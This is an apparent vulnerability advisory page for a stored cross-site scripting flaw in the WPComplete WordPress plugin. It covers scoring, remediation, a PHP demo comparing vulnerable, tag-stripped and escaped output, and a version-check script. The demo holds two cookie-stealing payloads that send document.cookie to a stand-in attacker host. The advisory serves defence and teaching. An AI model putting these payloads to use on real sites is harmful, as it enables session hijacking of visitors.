Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete (wpcomplete) allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5 (inclusive).
Published: 2025-06-20
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

StellarWP WPComplete stores attacker-controlled input and later writes it into generated pages without escaping it, a stored cross-site scripting (XSS) flaw classified as CWE-79 (improper neutralization of input during web page generation). An attacker holding an account that can submit content through the plugin (the CVSS vector records PR:L, so a low-privileged user suffices) can persist a script payload that executes in the browser of every user who views the affected page. Consequences include session hijacking, actions performed with the victim's privileges, phishing for credentials from within the trusted page, content injection and redirection of visitors to attacker-controlled sites; because the payload is served from the site's own origin, it has the same access as the site's legitimate scripts.
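
The pattern described above, as an added example in plain PHP that is not WPComplete's or StellarWP's code (the plugin's actual injection point is not documented on this page): a setting is stored verbatim, then rendered three ways, concatenated straight into markup (vulnerable), passed through a denylist that strips only `<script>` elements (the kind of filter a script-blocking security plugin applies), and escaped for the HTML text context at output time (fixed). The option name `completion_message`, the CSS class, the attacker host and the payloads are all constructed for the demonstration, and the `esc_html()` shim stands in for the WordPress helper of the same name, which only exists inside a WordPress runtime.

```php
<?php
// Added example, not WPComplete's or StellarWP's code: the stored-XSS pattern
// behind CWE-79 in a WordPress plugin, beside its hardened form. Runs with
// plain PHP (php stored_xss_demo.php). The esc_html() shim stands in for the
// WordPress helper of the same name, which only exists inside WordPress.
declare(strict_types=1);

if (!function_exists('esc_html')) {
    // Equivalent of WordPress esc_html(): encode &, <, >, " and ' for HTML text.
    function esc_html(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// Constructed stand-in for data the plugin persists (wp_options, post meta).
// The option name "completion_message" used below is hypothetical.
function save_setting(array &$storage, string $key, string $value): void
{
    // Stored verbatim: the defect is not here but at output time.
    $storage[$key] = $value;
}

// Vulnerable: the stored string is concatenated straight into markup.
function render_vulnerable(array $storage, string $key): string
{
    return '<p class="wpc-message">' . $storage[$key] . '</p>';
}

// Denylist "fix" of the kind a script-blocking security plugin applies:
// removes <script> elements and nothing else.
function strip_script_tags(string $html): string
{
    return (string) preg_replace('#<script\b[^>]*>.*?</script>#is', '', $html);
}

function render_denylisted(array $storage, string $key): string
{
    return '<p class="wpc-message">' . strip_script_tags($storage[$key]) . '</p>';
}

// Fixed: escape for the HTML text context at the point of output. If the
// value must legitimately carry markup, filter it through an allowlist
// (WordPress: wp_kses_post()) rather than a regex denylist.
function render_escaped(array $storage, string $key): string
{
    return '<p class="wpc-message">' . esc_html($storage[$key]) . '</p>';
}

// Constructed payloads: the first relies on <script>; the second needs no
// script tag at all, so stripping <script> does nothing to it.
$payloads = [
    'script tag'    => 'Done!<script>fetch("https://attacker.example/?c="+document.cookie)</script>',
    'event handler' => 'Done!<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
];

$storage = [];
foreach ($payloads as $name => $payload) {
    save_setting($storage, 'completion_message', $payload);
    echo "== $name ==\n";
    echo 'vulnerable : ' . render_vulnerable($storage, 'completion_message') . "\n";
    echo 'denylisted : ' . render_denylisted($storage, 'completion_message') . "\n";
    echo 'escaped    : ' . render_escaped($storage, 'completion_message') . "\n\n";
}
```

Run it with `php stored_xss_demo.php`. For the event-handler payload the "denylisted" line still contains the live `onerror` attribute, while the "escaped" line renders the whole payload as inert text (`&lt;img src=x onerror=...&gt;`), which is why output escaping, not tag stripping, is the fix for this class of bug.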

Affected Systems

All WordPress sites running WPComplete at version 2.9.5 or earlier are affected. The advisory gives no lower bound ("from n/a"), so treat every release up to and including 2.9.5 as vulnerable unless the vendor states otherwise.

Risk and Exploitability

The CVSS 3.1 base score is 6.5 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L: reachable over the network, low attack complexity, low privileges required, user interaction required (a victim has to load the affected page), and changed scope because the script runs in visitors' browsers rather than in the plugin's own security context, with low confidentiality, integrity and availability impact each. The EPSS score of less than 1 % indicates a low probability of exploitation in the wild, the SSVC assessment recorded in the History section rates Exploitation "none" and Automatable "no", and the CVE is not listed in the CISA KEV catalog. The likely attack path is a low-privileged authenticated user who can add or edit content that the plugin stores; once the payload is stored, every visitor to that page receives it, so the blast radius is the site's whole audience rather than a single targeted user.

Generated by OpenCVE AI on April 30, 2026 at 11:01 UTC.

Remediation

No vendor fix or workaround is currently provided.

OpenCVE Recommended Actions

  • Upgrade WPComplete to a release later than 2.9.5 as soon as the vendor ships one; this page records no fixed version, so confirm in the vendor changelog that the release addresses this issue before treating the upgrade as remediation.
  • If an upgrade cannot be performed promptly, deactivate or uninstall WPComplete to remove the attack surface.
  • As a stop-gap only, enforce output sanitization or deploy a security plugin that filters script content, and treat it as partial: filters that strip only <script> tags miss event-handler attributes and other script vectors. Also review which user roles can submit content the plugin stores, and a Content-Security-Policy that disallows inline script limits what a stored payload can do.
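
The first two actions need the installed version. The following added script (not OpenCVE's or StellarWP's code) reads the "Version:" field from a plugin's main file, the same header comment WordPress itself parses, and compares it with the affected range in this advisory; it assumes the plugin directory is wp-content/plugins/wpcomplete/, and since the main file's name is not stated on this page the path is taken from the command line. A constructed sample header lets it run without a WordPress install.

```php
<?php
// Added example, not OpenCVE's or StellarWP's code: read the "Version:"
// field from an installed plugin's main file (the header WordPress itself
// parses) and compare it with the affected range in this advisory
// ("from n/a through 2.9.5"). Assumes the plugin directory is
// wp-content/plugins/wpcomplete/; the main file's name is not stated on this
// page, so the path is taken from the command line.
declare(strict_types=1);

const LAST_AFFECTED_VERSION = '2.9.5';

// WordPress reads plugin headers from the first 8 KiB of the file with a
// case-insensitive "Field: value" match; this mirrors that for "Version".
function plugin_header_version(string $fileContents): ?string
{
    $header = substr($fileContents, 0, 8192);
    if (preg_match('/^[ \t\/*#@]*Version:\s*(\S+)/mi', $header, $m) === 1) {
        return $m[1];
    }
    return null;
}

// "from n/a through 2.9.5": no lower bound, so anything <= 2.9.5 is in range.
function is_affected(string $version): bool
{
    return version_compare($version, LAST_AFFECTED_VERSION, '<=');
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $contents = @file_get_contents($argv[1]);
    if ($contents === false) {
        fwrite(STDERR, "cannot read {$argv[1]}\n");
        exit(2);
    }
    $version = plugin_header_version($contents);
    if ($version === null) {
        fwrite(STDERR, "no Version: header found in {$argv[1]}\n");
        exit(2);
    }
    printf("WPComplete %s: %s\n", $version,
        is_affected($version) ? 'AFFECTED (<= ' . LAST_AFFECTED_VERSION . ')' : 'outside the affected range');
    exit(is_affected($version) ? 1 : 0);
}

// Constructed sample headers so the script also runs without a WordPress install.
$sample = "<?php\n/**\n * Plugin Name: WPComplete\n * Version: 2.9.5\n */\n";
foreach ([$sample, str_replace('2.9.5', '2.10.0', $sample)] as $file) {
    $version = plugin_header_version($file) ?? 'unknown';
    printf("sample %-7s affected: %s\n", $version, is_affected($version) ? 'yes' : 'no');
}
```

Run it as `php wpcomplete_version_check.php /var/www/html/wp-content/plugins/wpcomplete/<main-file>.php`; the exit code is 1 when the installed version is in the affected range, so it drops into a fleet-wide check loop. Where WP-CLI is installed, `wp plugin get wpcomplete --field=version` gives the same number.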

Advisories
  • Source: EUVD
    ID: EUVD-2025-19019
    Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5.
History

Thu, 23 Apr 2026 15:00:00 +0000

  • Metrics (cvssV3_1): {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

  • Description, value removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5.
  • Description, value added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete wpcomplete allows Stored XSS.This issue affects WPComplete: from n/a through <= 2.9.5.
  • References: (values not shown)
  • Metrics (cvssV3_1): {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Tue, 24 Jun 2025 14:15:00 +0000

  • Metrics (ssvc): {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 20 Jun 2025 15:15:00 +0000

  • Description, value added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in StellarWP WPComplete allows Stored XSS. This issue affects WPComplete: from n/a through 2.9.5.
  • Title, value added: WordPress WPComplete plugin <= 2.9.5 - Cross Site Scripting (XSS) Vulnerability
  • Weaknesses, value added: CWE-79
  • References: (values not shown)
  • Metrics (cvssV3_1): {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:13:16.924Z

Reserved: 2025-06-11T16:08:50.967Z

Link: CVE-2025-50046

Vulnrichment

Updated: 2025-06-24T13:38:05.857Z

NVD

Status: Deferred

Published: 2025-06-20T15:15:31.003

Modified: 2026-04-23T15:32:02.533

Link: CVE-2025-50046

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-30T11:15:35Z

Weaknesses